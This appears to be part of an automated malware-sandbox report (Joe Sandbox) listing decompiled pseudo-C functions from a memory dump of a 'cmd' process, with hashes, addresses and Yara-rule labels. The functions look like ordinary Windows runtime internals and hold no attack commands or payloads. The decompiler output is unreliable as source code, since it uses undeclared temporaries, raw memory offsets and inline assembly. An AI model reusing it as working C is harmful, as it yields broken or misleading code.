                                                                                                                                          • Instruction ID: 900db08fb4785599e21210d1c600c9a4475ae116e3cd8feb388b02309f6c4525
                                                                                                                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                                          • Instruction Fuzzy Hash: AD01CC76240605BFD621EF25CC80EB2F76DFB55390F058125F244DA560CB32ACA0EAE0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA4015 Relevance: .0, Instructions: 49COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                          			E03CA4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03BF2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03BF2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x3cc86ac);
					E03BDF900(0x3cc86d4, _t28);
					E03BEFFB0(0x3cc86ac, _t28, 0x3cc86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E03BEFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                                                          0x03ca401a
                                                                                                                                          0x03ca401e
                                                                                                                                          0x03ca4023
                                                                                                                                          0x03ca4028
                                                                                                                                          0x03ca4029
                                                                                                                                          0x03ca402b
                                                                                                                                          0x03ca402f
                                                                                                                                          0x03ca4043
                                                                                                                                          0x03ca4046
                                                                                                                                          0x03ca4051
                                                                                                                                          0x03ca4057
                                                                                                                                          0x03ca405f
                                                                                                                                          0x03ca4062
                                                                                                                                          0x03ca4067
                                                                                                                                          0x03ca406f
                                                                                                                                          0x03ca407c
                                                                                                                                          0x03ca407c
                                                                                                                                          0x03ca408c
                                                                                                                                          0x03ca408c
                                                                                                                                          0x03ca4097

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d8b9c4fcece09b2f8d22f894cec935ba98582881ae6add2ba39454d5a7500d28
                                                                                                                                          • Instruction ID: 04f5d8bd1688e2c280ebb3c778c9fe69d009e04c3dd3d50fb5f7a93eca8a9b22
                                                                                                                                          • Opcode Fuzzy Hash: d8b9c4fcece09b2f8d22f894cec935ba98582881ae6add2ba39454d5a7500d28
                                                                                                                                          • Instruction Fuzzy Hash: EB018475641B497FC211EB79CD80E57B7ACEB45658B0102B9F608CBA51DB24EC11C6E4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9138A Relevance: .0, Instructions: 48COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                          			E03C9138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x3ccd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E03C1FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03BF7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                          0x03c9138a
                                                                                                                                          0x03c9138a
                                                                                                                                          0x03c91399
                                                                                                                                          0x03c913a3
                                                                                                                                          0x03c913a8
                                                                                                                                          0x03c913aa
                                                                                                                                          0x03c913b5
                                                                                                                                          0x03c913bb
                                                                                                                                          0x03c913c3
                                                                                                                                          0x03c913c6
                                                                                                                                          0x03c913c9
                                                                                                                                          0x03c913d4
                                                                                                                                          0x03c913e6
                                                                                                                                          0x03c913d6
                                                                                                                                          0x03c913df
                                                                                                                                          0x03c913df
                                                                                                                                          0x03c913f1
                                                                                                                                          0x03c913f2
                                                                                                                                          0x03c913f4
                                                                                                                                          0x03c913f9
                                                                                                                                          0x03c9140e

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2243d1b59dbc6e58925c8c71f67c03668d74d5d7101b74f259fea1c359f48dae
                                                                                                                                          • Instruction ID: 0c68774fb0e068f4477f4c1d2ade948955ba5b68ecf8fa4359232c707f7bd310
                                                                                                                                          • Opcode Fuzzy Hash: 2243d1b59dbc6e58925c8c71f67c03668d74d5d7101b74f259fea1c359f48dae
                                                                                                                                          • Instruction Fuzzy Hash: C9018075A00308AFDB04DFA9D846AAEB7B8EF45710F454066F904EB280DA749A11DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C914FB Relevance: .0, Instructions: 48COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                          			E03C914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x3ccd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E03C1FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03BF7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                          0x03c914fb
                                                                                                                                          0x03c914fb
                                                                                                                                          0x03c9150a
                                                                                                                                          0x03c91514
                                                                                                                                          0x03c91519
                                                                                                                                          0x03c9151b
                                                                                                                                          0x03c91526
                                                                                                                                          0x03c9152c
                                                                                                                                          0x03c91534
                                                                                                                                          0x03c91537
                                                                                                                                          0x03c9153a
                                                                                                                                          0x03c91545
                                                                                                                                          0x03c91557
                                                                                                                                          0x03c91547
                                                                                                                                          0x03c91550
                                                                                                                                          0x03c91550
                                                                                                                                          0x03c91562
                                                                                                                                          0x03c91563
                                                                                                                                          0x03c91565
                                                                                                                                          0x03c9156a
                                                                                                                                          0x03c9157f

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f9c874e6ed972f62b52a1d084720108941b76091e5a8d0fd66400014955ca059
                                                                                                                                          • Instruction ID: ef42f2f061ee5fa21e8358f433873d74f29dfda200eec262a4836bcf2bce0b0d
                                                                                                                                          • Opcode Fuzzy Hash: f9c874e6ed972f62b52a1d084720108941b76091e5a8d0fd66400014955ca059
                                                                                                                                          • Instruction Fuzzy Hash: 9201C074A00208AFCB00EFA8C806EAEB7B8EF45710F054066F904EB380DA74DA00DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD58EC Relevance: .0, Instructions: 47COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                          			E03BD58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x3ccd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x3bb5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E03BD5943() != 0 &&  *0x3cc5320 > 5) {
					E03C57B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03C57B5E( &_v28, _t28);
					_t11 = E03C57B9C(0x3cc5320, 0x3bbbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E03C1B640(_t11, _t17, _v8 ^ _t29, 0x3bbbf15, _t27, _t28);
			}















                                                                                                                                          0x03bd58fb
                                                                                                                                          0x03bd58fe
                                                                                                                                          0x03bd5906
                                                                                                                                          0x03bd590a
                                                                                                                                          0x03bd593c
                                                                                                                                          0x03bd593c
                                                                                                                                          0x03bd590c
                                                                                                                                          0x03bd590c
                                                                                                                                          0x03bd5911
                                                                                                                                          0x00000000
                                                                                                                                          0x03bd5913
                                                                                                                                          0x03bd5913
                                                                                                                                          0x03bd5913
                                                                                                                                          0x03bd5911
                                                                                                                                          0x03bd591d
                                                                                                                                          0x03c31035
                                                                                                                                          0x03c3103c
                                                                                                                                          0x03c3103f
                                                                                                                                          0x03c31056
                                                                                                                                          0x03c31056
                                                                                                                                          0x03bd593b

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 18d62d0bdb5b39ed8be4ee6a27414269686b0443e6d4efecba34a5b6e26b6c4d
                                                                                                                                          • Instruction ID: c16dab3a967cdc82195bb3443c75cef08c0e331ffc9360a3e68091d9b5a4f83e
                                                                                                                                          • Opcode Fuzzy Hash: 18d62d0bdb5b39ed8be4ee6a27414269686b0443e6d4efecba34a5b6e26b6c4d
                                                                                                                                          • Instruction Fuzzy Hash: 9B01A775A106089BC724EA65DC009BEB7B8EF86134F9900BAE806DB244EF74ED46C754
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BEB02A Relevance: .0, Instructions: 46COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BEB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03BF7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03C57016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                                                          0x03beb037
                                                                                                                                          0x03beb039
                                                                                                                                          0x03beb03b
                                                                                                                                          0x03beb040
                                                                                                                                          0x03c3a60e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3a61d
                                                                                                                                          0x03beb04b
                                                                                                                                          0x03beb04e
                                                                                                                                          0x03c3a627
                                                                                                                                          0x03c3a634
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3a641
                                                                                                                                          0x03c3a653
                                                                                                                                          0x03c3a643
                                                                                                                                          0x03c3a64c
                                                                                                                                          0x03c3a64c
                                                                                                                                          0x03c3a65b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3a66c
                                                                                                                                          0x03beb057
                                                                                                                                          0x03beb057
                                                                                                                                          0x03beb057
                                                                                                                                          0x03beb046
                                                                                                                                          0x03beb046
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                          • Instruction ID: 46547f60ca2cb4add44329186633d2b0afb53b31435ab9500b9d8d6f9b8f68c0
                                                                                                                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                          • Instruction Fuzzy Hash: 10018F76249A849FD326C75DC988F66B7ECEB46758F0D00F1F919CBA62D728EC40C620
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA1074 Relevance: .0, Instructions: 46COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03CA1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E03CA165E(__ebx, 0x3cc8ae4, (__edx -  *0x3cc8b04 >> 0x14) + (__edx -  *0x3cc8b04 >> 0x14), __edi, __ecx, (__edx -  *0x3cc8b04 >> 0x14) + (__edx -  *0x3cc8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E03C9AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03BF7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E03C8FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                                                          0x03ca1074
                                                                                                                                          0x03ca1080
                                                                                                                                          0x03ca1082
                                                                                                                                          0x03ca108a
                                                                                                                                          0x03ca108f
                                                                                                                                          0x03ca1093
                                                                                                                                          0x03ca10ab
                                                                                                                                          0x03ca10ab
                                                                                                                                          0x03ca10c3
                                                                                                                                          0x03ca10cf
                                                                                                                                          0x03ca10e1
                                                                                                                                          0x03ca10d1
                                                                                                                                          0x03ca10da
                                                                                                                                          0x03ca10da
                                                                                                                                          0x03ca10e9
                                                                                                                                          0x03ca10f5
                                                                                                                                          0x03ca10f5
                                                                                                                                          0x03ca10fe

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5e1a9b24657f513975f170cdc770abe3e201616dccd308b7b4b449e4de8e6086
                                                                                                                                          • Instruction ID: 16b4ab3f061f051911e80bf1d6222c28b75d0a9990e950777190392594e17b7e
                                                                                                                                          • Opcode Fuzzy Hash: 5e1a9b24657f513975f170cdc770abe3e201616dccd308b7b4b449e4de8e6086
                                                                                                                                          • Instruction Fuzzy Hash: 4B012476504B429FC711EF29C904B1BB7E5AF84218F098629F885CB290EE30DA40DBA2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C8FEC0 Relevance: .0, Instructions: 46COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                          			E03C8FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x3ccd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E03C1FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03BF7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                          0x03c8fec0
                                                                                                                                          0x03c8fec0
                                                                                                                                          0x03c8fecf
                                                                                                                                          0x03c8fed9
                                                                                                                                          0x03c8fede
                                                                                                                                          0x03c8fee0
                                                                                                                                          0x03c8feeb
                                                                                                                                          0x03c8fef3
                                                                                                                                          0x03c8fef6
                                                                                                                                          0x03c8fef9
                                                                                                                                          0x03c8ff04
                                                                                                                                          0x03c8ff16
                                                                                                                                          0x03c8ff06
                                                                                                                                          0x03c8ff0f
                                                                                                                                          0x03c8ff0f
                                                                                                                                          0x03c8ff21
                                                                                                                                          0x03c8ff22
                                                                                                                                          0x03c8ff24
                                                                                                                                          0x03c8ff29
                                                                                                                                          0x03c8ff3e

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 21bef1d7c98cdf03b1b2dc18a834b752ebc58ba914e9ab8aa32612e25866e5f9
                                                                                                                                          • Instruction ID: 33b78aab2896734b015bfad7c7f40e6b488c1d3a19df256fad6df5125d09e925
                                                                                                                                          • Opcode Fuzzy Hash: 21bef1d7c98cdf03b1b2dc18a834b752ebc58ba914e9ab8aa32612e25866e5f9
                                                                                                                                          • Instruction Fuzzy Hash: 6B018475A00308AFCB14EBA9D845FAEB7B8EF45710F44406AF901EB280EA74DA51D794
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C8FE3F Relevance: .0, Instructions: 46COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                          			E03C8FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x3ccd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E03C1FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03BF7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                          0x03c8fe3f
                                                                                                                                          0x03c8fe3f
                                                                                                                                          0x03c8fe4e
                                                                                                                                          0x03c8fe58
                                                                                                                                          0x03c8fe5d
                                                                                                                                          0x03c8fe5f
                                                                                                                                          0x03c8fe6a
                                                                                                                                          0x03c8fe72
                                                                                                                                          0x03c8fe75
                                                                                                                                          0x03c8fe78
                                                                                                                                          0x03c8fe83
                                                                                                                                          0x03c8fe95
                                                                                                                                          0x03c8fe85
                                                                                                                                          0x03c8fe8e
                                                                                                                                          0x03c8fe8e
                                                                                                                                          0x03c8fea0
                                                                                                                                          0x03c8fea1
                                                                                                                                          0x03c8fea3
                                                                                                                                          0x03c8fea8
                                                                                                                                          0x03c8febd

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b1390aed0e5749e7421714da8ce06c96808138792daa6711e410dff9060dffa3
                                                                                                                                          • Instruction ID: 2b03cdc3f4814b028fec9a0c41e0533d3dcf0e612a2d0a0bca575578ee19b6b2
                                                                                                                                          • Opcode Fuzzy Hash: b1390aed0e5749e7421714da8ce06c96808138792daa6711e410dff9060dffa3
                                                                                                                                          • Instruction Fuzzy Hash: 46018475A00308AFCB14EFA9D845FAEB7B8EF45714F04406AF900EF281DA74DA11D794
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA8A62 Relevance: .0, Instructions: 44COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                          			E03CA8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x3ccd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03BF7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E03C1B640(E03C19AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                          0x03ca8a62
                                                                                                                                          0x03ca8a71
                                                                                                                                          0x03ca8a79
                                                                                                                                          0x03ca8a82
                                                                                                                                          0x03ca8a85
                                                                                                                                          0x03ca8a89
                                                                                                                                          0x03ca8a8c
                                                                                                                                          0x03ca8a8f
                                                                                                                                          0x03ca8a92
                                                                                                                                          0x03ca8a95
                                                                                                                                          0x03ca8a9f
                                                                                                                                          0x03ca8ab1
                                                                                                                                          0x03ca8aa1
                                                                                                                                          0x03ca8aaa
                                                                                                                                          0x03ca8aaa
                                                                                                                                          0x03ca8abc
                                                                                                                                          0x03ca8abd
                                                                                                                                          0x03ca8abf
                                                                                                                                          0x03ca8ac4
                                                                                                                                          0x03ca8ada

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5f4f079611aded20897ffe783126600f305bd4d55e195939a7e3d7bab8b468f9
                                                                                                                                          • Instruction ID: 0cf04ad924d7555d6a518b77935c57d5484a9e26b6bfe2c23e6800df8c1c4bbe
                                                                                                                                          • Opcode Fuzzy Hash: 5f4f079611aded20897ffe783126600f305bd4d55e195939a7e3d7bab8b468f9
                                                                                                                                          • Instruction Fuzzy Hash: 42011EB5A003199FCB04DFA9D9459AEBBB8EF49710F14405AF905EB341DA34AD11DBA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA8ED6 Relevance: .0, Instructions: 44COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                          			E03CA8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x3ccd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03BF7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                                                          0x03ca8ed6
                                                                                                                                          0x03ca8ee5
                                                                                                                                          0x03ca8eed
                                                                                                                                          0x03ca8ef0
                                                                                                                                          0x03ca8efa
                                                                                                                                          0x03ca8f03
                                                                                                                                          0x03ca8f0c
                                                                                                                                          0x03ca8f15
                                                                                                                                          0x03ca8f24
                                                                                                                                          0x03ca8f27
                                                                                                                                          0x03ca8f31
                                                                                                                                          0x03ca8f43
                                                                                                                                          0x03ca8f33
                                                                                                                                          0x03ca8f3c
                                                                                                                                          0x03ca8f3c
                                                                                                                                          0x03ca8f4e
                                                                                                                                          0x03ca8f4f
                                                                                                                                          0x03ca8f51
                                                                                                                                          0x03ca8f56
                                                                                                                                          0x03ca8f69

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
